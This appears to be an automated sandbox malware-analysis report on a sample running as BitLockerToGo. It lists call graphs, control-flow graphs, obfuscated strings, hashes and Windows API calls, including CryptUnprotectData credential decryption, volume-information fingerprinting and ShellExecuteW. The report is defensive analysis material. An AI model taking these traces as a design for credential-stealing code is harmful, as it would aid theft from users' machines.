19370 42a9ef 19371 42a9f9 19370->19371 19372 447840 LdrInitializeThunk 19371->19372 19373 42aa51 19372->19373 19374 447840 LdrInitializeThunk 19373->19374 19375 42aac1 19374->19375 19525 44492a 19526 444811 19525->19526 19527 4448ee 19526->19527 19529 4442c0 LdrInitializeThunk 19526->19529 19529->19527 19376 43d9ec 19377 43da40 19376->19377 19377->19377 19378 43da8f SysAllocString 19377->19378 19379 43dab8 19378->19379 19530 444fb4 GetForegroundWindow 19534 447480 19530->19534 19532 444fc0 GetForegroundWindow 19533 444fdc 19532->19533 19535 447490 19534->19535 19535->19532 19380 43daf2 19381 43db20 19380->19381 19381->19381 19382 43db61 SysAllocString 19381->19382 19383 43dbf0 19382->19383 19383->19383 19384 43dc5a SysAllocString 19383->19384 19385 43dc7d SysAllocString 19384->19385 19387 43dd80 19385->19387 19387->19387 19388 43ddea SysAllocString 19387->19388 19389 43de10 19388->19389 19389->19389 19390 4273f1 19391 427400 19390->19391 19392 447840 LdrInitializeThunk 19391->19392 19393 4274e0 19392->19393 19404 41f8f4 19405 41f902 19404->19405 19407 41f96a 19404->19407 19409 41f98f 19404->19409 19410 41fb50 19404->19410 19412 422e70 19405->19412 19408 447840 LdrInitializeThunk 19408->19407 19409->19405 19409->19407 19409->19409 19409->19410 19411 447840 LdrInitializeThunk 19409->19411 19410->19408 19410->19410 19411->19409 19413 422e95 19412->19413 19425 41e8d0 19413->19425 19415 422f82 19416 41e8d0 LdrInitializeThunk 19415->19416 19417 42301f 19416->19417 19418 41e8d0 LdrInitializeThunk 19417->19418 19419 4230c8 19418->19419 19420 41e8d0 LdrInitializeThunk 19419->19420 19422 42317e 19420->19422 19421 41e8d0 LdrInitializeThunk 19421->19422 19422->19421 19423 42333c 19422->19423 19435 43e180 19422->19435 19423->19407 19426 41e8f0 19425->19426 19426->19426 19427 447690 LdrInitializeThunk 19426->19427 19428 41e9ba 19427->19428 19429 41e9e6 19428->19429 19430 447a00 LdrInitializeThunk 19428->19430 19432 41ec0e 19428->19432 19434 41ea18 19428->19434 19431 447ae0 LdrInitializeThunk 19429->19431 19429->19432 19429->19434 19430->19429 19431->19434 19432->19415 19434->19432 19434->19434 19448 4442c0 LdrInitializeThunk 19434->19448 19436 447690 LdrInitializeThunk 19435->19436 19437 43e1a8 19436->19437 19438 43e1b7 19437->19438 19439 43e296 19437->19439 19445 43e24e 19437->19445 19458 4442c0 LdrInitializeThunk 19437->19458 19438->19422 19442 441240 RtlFreeHeap 19439->19442 19440 441770 LdrInitializeThunk 19440->19445 19444 43e29c 19442->19444 19444->19438 19457 4442c0 LdrInitializeThunk 19444->19457 19445->19438 19445->19439 19445->19440 19449 4416a0 19445->19449 19453 441540 19445->19453 19448->19432 19450 44173e 19449->19450 19451 4416aa 19449->19451 19450->19445 19451->19450 19459 4442c0 LdrInitializeThunk 19451->19459 19454 44161e 19453->19454 19455 441552 19453->19455 19454->19445 19455->19454 19460 4442c0 LdrInitializeThunk 19455->19460 19457->19438 19458->19445 19459->19450 19460->19454

                                                                                                                                                                          Executed Functions

                                                                                                                                                                          Function 004321CC Relevance: 32.4, APIs: 5, Strings: 12, Instructions: 2634COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: a_$&N$(M$2AC$7M$MNOP$\%QZ$jXJ2$lL\J$tr${o}'$~ffv
                                                                                                                                                                          • API String ID: 0-3686979115
                                                                                                                                                                          • Opcode ID: 4611b88beb6ccb50771dc7916f51dade34d99978ba48bb579bdfeb48ba7b1672
                                                                                                                                                                          • Instruction ID: 3656d1d5997a86bc1b36dec66e79683f19dbb65fa1b2c960236edae77f7af5b8
                                                                                                                                                                          • Opcode Fuzzy Hash: 4611b88beb6ccb50771dc7916f51dade34d99978ba48bb579bdfeb48ba7b1672
                                                                                                                                                                          • Instruction Fuzzy Hash: CF031670604B818BE7258F3584907A3BBE1AF5B305F1899AEC1EB4B383C77DA506CB55
                                                                                                                                                                          Function 0043DAF2 Relevance: 19.5, APIs: 4, Strings: 7, Instructions: 252memoryCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 407 43daf2-43db13 408 43db20-43db5f 407->408 408->408 409 43db61-43dbe6 SysAllocString 408->409 410 43dbf0-43dc58 409->410 410->410 411 43dc5a-43dca1 SysAllocString 410->411 413 43dcb0-43dcef 411->413 413->413 414 43dcf1-43dd77 SysAllocString 413->414 415 43dd80-43dde8 414->415 415->415 416 43ddea-43de0c SysAllocString 415->416 417 43de10 416->417 417->417
                                                                                                                                                                          APIs
                                                                                                                                                                          • SysAllocString.OLEAUT32(o1c3), ref: 0043DB66
                                                                                                                                                                          • SysAllocString.OLEAUT32(135F1163), ref: 0043DC5F
                                                                                                                                                                          • SysAllocString.OLEAUT32(o1c3), ref: 0043DCF6
                                                                                                                                                                          • SysAllocString.OLEAUT32(135F1163), ref: 0043DDEF
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AllocString
                                                                                                                                                                          • String ID: !$K5_7$S%U'$h=>?$n=Y?$o1c3$z9s;
                                                                                                                                                                          • API String ID: 2525500382-3441675521
                                                                                                                                                                          • Opcode ID: 5e3a75a4ddf47f3f25c6a00477788f6c1369728b9cc9b9551bac2f01f7343e3d
                                                                                                                                                                          • Instruction ID: e375b97578b392eabe0a7dd7cc219a651d78669318e9ed7630db87dab6690228
                                                                                                                                                                          • Opcode Fuzzy Hash: 5e3a75a4ddf47f3f25c6a00477788f6c1369728b9cc9b9551bac2f01f7343e3d
                                                                                                                                                                          • Instruction Fuzzy Hash: 55710FB2E183109FD314CF65D88434BBBE6EFD9344F09D92DE985AB214C77889098B82
                                                                                                                                                                          Function 0043DE1A Relevance: 14.5, APIs: 6, Strings: 2, Instructions: 466COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 483 43de1a-43de26 484 43e0e3 483->484 485 43df42-43df58 483->485 486 43dfe0-43dfef 483->486 487 43e0c0-43e0c9 483->487 488 43e140-43e14d 483->488 489 43e006 483->489 490 43e0e6-43e10f call 4247c0 483->490 491 43e0a4-43e0b6 483->491 492 43e16b-43e172 483->492 493 43e02a-43e030 483->493 494 43de6e-43deca VariantInit 483->494 495 43de2d-43de49 483->495 496 43e010-43e016 call 40d040 483->496 497 43e0d0-43e0dc 483->497 498 43e1b7-43e1b9 483->498 499 43dff6-43dfff 483->499 500 43e034-43e09d SysFreeString * 3 call 446c90 GetVolumeInformationW 483->500 501 43e154-43e164 483->501 502 43e019-43e026 VariantClear 483->502 503 43e1be-43e1e6 call 4411b0 483->503 484->490 506 43df92-43dfcd call 40d030 call 434270 485->506 507 43df5a-43df63 485->507 486->484 486->487 486->488 486->489 486->490 486->491 486->492 486->496 486->497 486->498 486->499 486->501 486->502 486->503 509 43e340-43e352 call 4416a0 486->509 510 43e272-43e284 486->510 511 43e3b1-43e3b3 486->511 512 43e290 486->512 513 43e3d0-43e3db call 441770 486->513 514 43e296-43e2b4 call 441240 486->514 515 43e359-43e3aa call 441510 call 441540 486->515 516 43e3bc-43e3c7 call 441770 486->516 487->484 487->488 487->490 487->497 487->498 487->501 487->503 508 43e3e1-43e3ee 487->508 487->509 487->510 487->511 487->512 487->513 487->514 487->515 487->516 488->488 488->498 488->501 488->503 488->508 488->509 488->510 488->511 488->512 488->513 488->514 488->515 488->516 489->496 540 43e110-43e117 490->540 491->484 491->487 491->488 491->490 491->492 491->497 491->498 491->501 491->503 491->508 491->509 491->510 491->511 491->512 491->513 491->514 491->515 491->516 492->498 493->500 505 43ded0-43defe 494->505 522 43de4d-43de67 495->522 496->502 497->484 497->488 497->490 497->498 497->501 497->503 497->508 497->509 497->510 497->511 497->512 497->513 497->514 497->515 497->516 517 43e412-43e419 498->517 499->484 499->486 499->487 499->488 499->489 499->490 499->491 499->492 499->496 499->497 499->498 499->499 499->501 499->502 499->503 499->508 499->509 499->510 499->511 499->512 499->513 499->514 499->515 499->516 500->484 500->487 500->488 500->490 500->491 500->492 500->497 500->498 500->501 500->503 500->508 500->509 500->510 500->511 500->512 500->513 500->514 500->515 500->516 501->484 501->487 501->488 501->490 501->492 501->497 501->498 501->501 501->503 501->508 501->509 501->510 501->511 501->512 501->513 501->514 501->515 501->516 502->493 538 43e1f0-43e225 503->538 505->505 525 43df00-43df19 505->525 506->484 506->486 506->487 506->488 506->489 506->490 506->491 506->492 506->496 506->497 506->498 506->499 506->501 506->502 506->503 506->509 506->510 506->511 506->512 506->514 506->515 526 43df71-43df75 507->526 508->509 509->508 509->511 509->512 509->513 509->514 509->515 509->516 510->508 510->509 510->511 510->512 510->513 510->514 510->515 510->516 511->516 513->508 543 43e2c0-43e2f6 514->543 515->508 515->509 515->511 515->513 515->516 516->513 522->484 522->485 522->486 522->487 522->488 522->489 522->490 522->491 522->492 522->493 522->494 522->496 522->497 522->498 522->499 522->501 522->502 522->503 546 43df1d-43df3b 525->546 536 43df77-43df80 526->536 537 43df65 526->537 548 43df82-43df85 536->548 549 43df87-43df8b 536->549 547 43df66-43df6f 537->547 538->538 550 43e227-43e232 538->550 540->540 551 43e119-43e134 540->551 543->543 553 43e2f8-43e300 543->553 546->484 546->485 546->486 546->487 546->488 546->489 546->490 546->491 546->492 546->496 546->497 546->498 546->499 546->501 546->502 546->503 546->510 546->512 546->514 547->506 547->526 548->547 549->547 558 43df8d-43df90 549->558 556 43e234-43e23b 550->556 557 43e25c-43e26b 550->557 551->488 551->498 551->501 551->503 551->508 551->509 551->510 551->511 551->512 551->513 551->514 551->515 551->516 560 43e306-43e311 553->560 561 43e40d-43e410 553->561 563 43e240-43e247 556->563 557->508 557->509 557->510 557->511 557->512 557->513 557->514 557->515 557->516 558->547 564 43e320-43e327 560->564 561->517 565 43e250-43e256 563->565 566 43e249-43e24c 563->566 567 43e3f3-43e3f9 564->567 568 43e32d-43e330 564->568 565->557 570 43e41a-43e449 call 4442c0 565->570 566->563 569 43e24e 566->569 567->561 572 43e3fb-43e40a call 4442c0 567->572 568->564 571 43e332 568->571 569->557 570->508 570->509 570->510 570->511 570->512 570->513 570->514 570->515 570->516 571->561 572->561
                                                                                                                                                                          APIs
                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 0043DE73
                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 0043E01A
                                                                                                                                                                          • SysFreeString.OLEAUT32 ref: 0043E035
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 0043E043
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 0043E054
                                                                                                                                                                          • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0043E091
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FreeString$Variant$ClearInformationInitVolume
                                                                                                                                                                          • String ID: MNOP$ts
                                                                                                                                                                          • API String ID: 1717694972-559354537
                                                                                                                                                                          • Opcode ID: 54e60837902f482b477f2362dcacf9aa76a2d5e001c8c391ff905926b9de8589
                                                                                                                                                                          • Instruction ID: 0cc59e07f5492757604fa8be6fdf46c9643aade133964c6e2580995c58aea401
                                                                                                                                                                          • Opcode Fuzzy Hash: 54e60837902f482b477f2362dcacf9aa76a2d5e001c8c391ff905926b9de8589
                                                                                                                                                                          • Instruction Fuzzy Hash: 43E11076A08300DFDB04CF69D881BAFB7A5FB89305F18882DE586972A1E778D905CB45
                                                                                                                                                                          Function 0040D740 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 174threadCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 577 40d740-40d74d call 442d70 580 40d952-40d954 ExitProcess 577->580 581 40d753-40d75f 577->581 582 40d760-40d772 581->582 582->582 583 40d774-40d827 582->583 584 40d830-40d842 583->584 584->584 585 40d844-40d849 584->585 586 40d91b-40d922 call 43acb0 585->586 587 40d84f-40d87e 585->587 593 40d924-40d932 GetCurrentThreadId GetInputState 586->593 594 40d94d call 4441e0 586->594 589 40d880-40d892 587->589 589->589 591 40d894-40d8b5 589->591 592 40d8c0-40d900 591->592 592->592 595 40d902-40d915 ShellExecuteW 592->595 596 40d934 GetCurrentProcessId 593->596 597 40d93a-40d941 call 40e9f0 593->597 594->580 595->586 596->597 597->594 601 40d943 call 411740 597->601 603 40d948 call 410300 601->603 603->594
                                                                                                                                                                          APIs
                                                                                                                                                                          • ShellExecuteW.SHELL32(00000000,?,0044B3DA,?,00000000,00000005), ref: 0040D915
                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0040D924
                                                                                                                                                                          • GetInputState.USER32 ref: 0040D92A
                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(?,00000000,00000005), ref: 0040D934
                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 0040D954
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CurrentProcess$ExecuteExitInputShellStateThread
                                                                                                                                                                          • String ID: XY
                                                                                                                                                                          • API String ID: 288744916-554446067
                                                                                                                                                                          • Opcode ID: 7026894f862dffd87aba4c6d55ee65ac830496e22894bc787cf636a69c118e3f
                                                                                                                                                                          • Instruction ID: 465d4b7a2585bc09fb711781e3a3ae6e6e5e6265eec9b9c9a6ba7f1e9973c278
                                                                                                                                                                          • Opcode Fuzzy Hash: 7026894f862dffd87aba4c6d55ee65ac830496e22894bc787cf636a69c118e3f
                                                                                                                                                                          • Instruction Fuzzy Hash: C0515772A582114BD7089F74CC167AFBBD1DBD2718F089A3DD4C6EB291DA7C8C058785
                                                                                                                                                                          Function 00431C50 Relevance: 4.2, Strings: 3, Instructions: 438COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 701 431c50-431ca2 call 40d030 704 431cb0-431cd5 701->704 704->704 705 431cd7-431d25 704->705 706 431d30-431d8d 705->706 706->706 707 431d8f-431eaa 706->707 708 431eb0-431ecc 707->708 708->708 709 431ece-431eda 708->709 710 431efb-431f03 709->710 711 431edc-431ee5 709->711 713 431f05-431f08 710->713 714 431f1d 710->714 712 431ef0-431ef9 711->712 712->710 712->712 715 431f10-431f19 713->715 716 431f1f-431f2b 714->716 715->715 717 431f1b 715->717 718 431f4b-431f53 716->718 719 431f2d-431f33 716->719 717->716 721 431f55-431f56 718->721 722 431f6b-431f77 718->722 720 431f40-431f49 719->720 720->718 720->720 723 431f60-431f69 721->723 724 431f8b-431f9f call 446bb0 722->724 725 431f79-431f7f 722->725 723->722 723->723 729 431fa6 724->729 730 431fab-431fb1 724->730 726 431f80-431f89 725->726 726->724 726->726 729->730 731 432181-43218b 730->731 732 431fb7-431fc6 730->732 733 432191-432199 731->733 734 431fdc-431fe0 732->734 735 4321ab-4321b9 call 4343c0 733->735 736 43219b-43219f 733->736 737 431fe2-431fed 734->737 738 431fd0 734->738 745 4321be-4321c4 735->745 740 4321a0-4321a9 736->740 742 432000-432006 737->742 743 431fef-431ff4 737->743 739 431fd1-431fda 738->739 739->734 744 432013-432029 call 40cf90 739->744 740->735 740->740 742->739 746 432008-432011 742->746 743->739 749 43202f-432036 744->749 750 43218d-43218f 744->750 745->729 745->730 746->739 751 432040-43204d 749->751 750->733 752 432060-432066 751->752 753 43204f-432057 751->753 755 4320b0-4320c1 752->755 756 432068-43206b 752->756 754 43208a 753->754 758 43208d-432093 754->758 759 432123-43212c 755->759 760 4320c3-4320c6 755->760 756->755 757 43206d-432087 756->757 757->754 763 432096-43209c 758->763 761 432139-43213f 759->761 762 43212e-432134 759->762 760->759 764 4320c8-43211e 760->764 765 432141-43216b 761->765 766 432170-432175 761->766 762->763 767 4320a2-4320a4 763->767 768 43217a-43217f 763->768 764->758 765->754 766->754 767->751 769 4320a6 767->769 768->733 769->768
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: -,#$KTPF$PLYY
                                                                                                                                                                          • API String ID: 0-933768355
                                                                                                                                                                          • Opcode ID: c830612fce113daf95d0515b4dadca89eb48f8cf62f5e216fbc303d1d643f3e5
                                                                                                                                                                          • Instruction ID: 4b084376beab0e5d1c77c76ceee0ef197f343d228e61cd2838847b206eb42c2b
                                                                                                                                                                          • Opcode Fuzzy Hash: c830612fce113daf95d0515b4dadca89eb48f8cf62f5e216fbc303d1d643f3e5
                                                                                                                                                                          • Instruction Fuzzy Hash: 27E13870108B418BE7358F39C5A03A3BBE2EF9A310F188A6DC5EB0B386C7796505CB55
                                                                                                                                                                          Function 0040F6E0 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 770 40f6e0-40f717 771 40f720-40f74d 770->771 771->771 772 40f74f-40f855 771->772 773 40f860-40f893 772->773 773->773 774 40f895-40f8b7 773->774 775 40f8c0-40f8f9 774->775 775->775 776 40f8fb-40f914 call 410310 775->776 778 40f919-40f91e 776->778 779 40fa64-40fa66 778->779 780 40f924-40f93f 778->780 781 40fc09-40fc15 779->781 782 40f940-40f985 780->782 782->782 783 40f987-40f98f 782->783 784 40f990-40f99a 783->784 785 40f9a1-40f9a5 784->785 786 40f99c-40f99f 784->786 787 40fc00-40fc06 call 441240 785->787 788 40f9ab-40f9cf 785->788 786->784 786->785 787->781 790 40f9d0-40fa1b 788->790 790->790 792 40fa1d-40fa2a 790->792 793 40fa6b-40fa6f 792->793 794 40fa2c-40fa32 792->794 795 40fa75-40faa5 793->795 796 40fbfe 793->796 797 40fa47-40fa4b 794->797 799 40fab0-40fb0d 795->799 796->787 797->796 798 40fa51-40fa58 797->798 800 40fa5a-40fa5c 798->800 801 40fa5e 798->801 799->799 802 40fb0f-40fb18 799->802 800->801 803 40fa40-40fa45 801->803 804 40fa60-40fa62 801->804 805 40fb54-40fb56 802->805 806 40fb1a-40fb24 802->806 803->793 803->797 804->803 805->796 807 40fb5c-40fb6b 805->807 808 40fb37-40fb3b 806->808 809 40fb70-40fb92 807->809 808->796 810 40fb41-40fb48 808->810 809->809 811 40fb94-40fba0 809->811 812 40fb4a-40fb4c 810->812 813 40fb4e 810->813 816 40fbd0-40fbd2 811->816 817 40fba2-40fbae 811->817 812->813 814 40fb30-40fb35 813->814 815 40fb50-40fb52 813->815 814->805 814->808 815->814 819 40fbdc-40fbfc call 40f460 816->819 818 40fbb7-40fbbb 817->818 818->796 820 40fbbd-40fbc4 818->820 819->787 823 40fbc6-40fbc8 820->823 824 40fbca 820->824 823->824 825 40fbb0-40fbb5 824->825 826 40fbcc-40fbce 824->826 825->818 827 40fbd4-40fbda 825->827 826->825 827->796 827->819
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 4Ho$>)67$|
                                                                                                                                                                          • API String ID: 0-954626911
                                                                                                                                                                          • Opcode ID: d96bc924c7f09152f10dcaaffdd2465935632d14aa74084ae514f16a4ff0fba9
                                                                                                                                                                          • Instruction ID: a49d84cc3b78b00a8920eaac330edcf7beaceddc11f8ddb3ed92fa907981174f
                                                                                                                                                                          • Opcode Fuzzy Hash: d96bc924c7f09152f10dcaaffdd2465935632d14aa74084ae514f16a4ff0fba9
                                                                                                                                                                          • Instruction Fuzzy Hash: 19D1297264C3904BD324CF2484913ABFBE2ABD1714F18C93DE8D95B785D6799C0E8B86
                                                                                                                                                                          Function 0040FDCC Relevance: 2.9, Strings: 2, Instructions: 352COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 838 40fdcc-40fdd1 839 410033-4100cd call 40cf90 838->839 840 4100e2-4100eb 838->840 841 4100f2-4100f9 838->841 842 4100d4-4100dd 838->842 843 40fdd8-40fdda 838->843 844 4101a9-4101b5 838->844 845 4100fb-410115 838->845 846 41002a-41002e 838->846 847 40fddf-40ffc8 838->847 839->840 839->841 839->842 839->844 839->845 849 4101ba-4101e3 839->849 840->841 840->844 840->845 840->849 850 41014a-41016f 841->850 848 4102d3-4102da 842->848 852 4102ec-4102f3 843->852 856 4102ca 844->856 851 410120-410143 845->851 854 4102dd-4102e9 846->854 853 40ffd0-41000d 847->853 848->854 864 4102c1 849->864 865 4102b0 849->865 866 4102b2 849->866 867 410245-410252 call 444200 849->867 868 4102b9 849->868 869 41029b-4102a9 849->869 870 4101ea-410205 849->870 871 41026a-410299 849->871 872 41020c-410224 849->872 873 4102be 849->873 858 410170-410189 850->858 851->851 857 410145-410147 851->857 853->853 859 41000f-410017 853->859 854->852 856->848 857->850 858->858 863 41018b-4101a2 858->863 875 41001a-410023 859->875 863->844 863->849 864->856 866->868 880 410257-410263 867->880 868->873 869->865 870->864 870->865 870->866 870->867 870->868 870->869 870->871 870->872 870->873 871->865 879 41022d-41023e 872->879 873->864 875->839 875->840 875->841 875->842 875->844 875->845 875->846 875->849 879->865 879->866 879->867 879->868 879->869 879->871 879->873 880->865 880->866 880->868 880->869 880->871 880->873
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: TeBc$eYTg
                                                                                                                                                                          • API String ID: 0-1520256206
                                                                                                                                                                          • Opcode ID: 32695e0db0345247e68cbe9b8b32f82eb5ce7c3f205a617f9132e5ce00805434
                                                                                                                                                                          • Instruction ID: e6afab19e6d45f0cdd9358ecf5c9068d7ae2c4db10355e1d3b0525c8a52db234
                                                                                                                                                                          • Opcode Fuzzy Hash: 32695e0db0345247e68cbe9b8b32f82eb5ce7c3f205a617f9132e5ce00805434
                                                                                                                                                                          • Instruction Fuzzy Hash: 9AE179B5201701CFD3248F25D884756BBB2FB49318F2889ADD45A8F7A2CB76E847CB54
                                                                                                                                                                          Function 00410310 Relevance: 2.6, Strings: 2, Instructions: 106COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 911 410310-41056f 912 410570-41059a 911->912 912->912 913 41059c-4105ad 912->913 914 4105b0-4105ce 913->914
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 2W[F$>>
                                                                                                                                                                          • API String ID: 0-892849328
                                                                                                                                                                          • Opcode ID: c0d4ce0fed8bd8708f299d1196397565a226412dcdfafdc05830167a4d9ece94
                                                                                                                                                                          • Instruction ID: 7ecc30d320eb1d122996a0197f2796ef880947f6805e3d8819134336918cb3b1
                                                                                                                                                                          • Opcode Fuzzy Hash: c0d4ce0fed8bd8708f299d1196397565a226412dcdfafdc05830167a4d9ece94
                                                                                                                                                                          • Instruction Fuzzy Hash: 0F513EF09013699BEB76CF42AC8078EBA79AB41384F1096DCD2583B245CB744BC5CF88
                                                                                                                                                                          Function 0041F5CB Relevance: 1.7, APIs: 1, Instructions: 226COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 915 41f5cb-41f5cf 916 41f5d0-41f5d6 915->916 916->916 917 41f5d8-41f5eb 916->917 918 41f5f2 917->918 919 41f5ed-41f5f0 917->919 920 41f5f3-41f603 918->920 919->918 919->920 921 41f605-41f608 920->921 922 41f60a-41f60f 920->922 921->922 923 41f611 921->923 924 41f615-41f62d call 40d030 922->924 923->924 927 41f633-41f63a 924->927 928 41f729-41f788 call 446c90 CryptUnprotectData 924->928 930 41f654-41f6a0 call 423d70 * 2 927->930 934 41f8c3 928->934 935 41f7aa-41f7b4 928->935 936 41f78f 928->936 941 41f640-41f64e 930->941 942 41f6a2-41f6b9 call 423d70 930->942 934->934 938 41f7c0-41f7c9 935->938 936->935 938->938 940 41f7cb-41f7ce 938->940 943 41f7d0-41f7d5 940->943 944 41f7d7 940->944 941->928 941->930 942->941 949 41f6bb-41f6e4 942->949 946 41f7da-41f82f call 40d030 943->946 944->946 952 41f830-41f84b 946->952 949->941 951 41f6ea-41f704 call 423d70 949->951 951->941 958 41f70a-41f724 951->958 952->952 954 41f84d-41f855 952->954 956 41f871-41f881 954->956 957 41f857-41f85f 954->957 960 41f8a3 956->960 961 41f883-41f88f 956->961 959 41f860-41f86f 957->959 958->941 959->956 959->959 962 41f8a7-41f8bd call 40d9b0 960->962 963 41f890-41f89f 961->963 962->934 963->963 964 41f8a1 963->964 964->962
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 4a96c9e6bc9f89b0cae13e9a2b3900932862b8acd73fdc490aa97c827bbf1fd4
                                                                                                                                                                          • Instruction ID: 9df5a48c1f384c43e84d3540743b2144e5ec3da5c4cd4c7ef4a43b094e2083ea
                                                                                                                                                                          • Opcode Fuzzy Hash: 4a96c9e6bc9f89b0cae13e9a2b3900932862b8acd73fdc490aa97c827bbf1fd4
                                                                                                                                                                          • Instruction Fuzzy Hash: 8881E3719083418FC714CF24C4416ABB7F1EF96358F148A6EE4D987391E738E98ACB4A
                                                                                                                                                                          Function 0042D020 Relevance: 1.6, Strings: 1, Instructions: 345COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                          • String ID: MNOP
                                                                                                                                                                          • API String ID: 2994545307-783613192
                                                                                                                                                                          • Opcode ID: 3c71e2226e8c851433d7d95e565c2f009b9be9b20bd935852684ed765de002f7
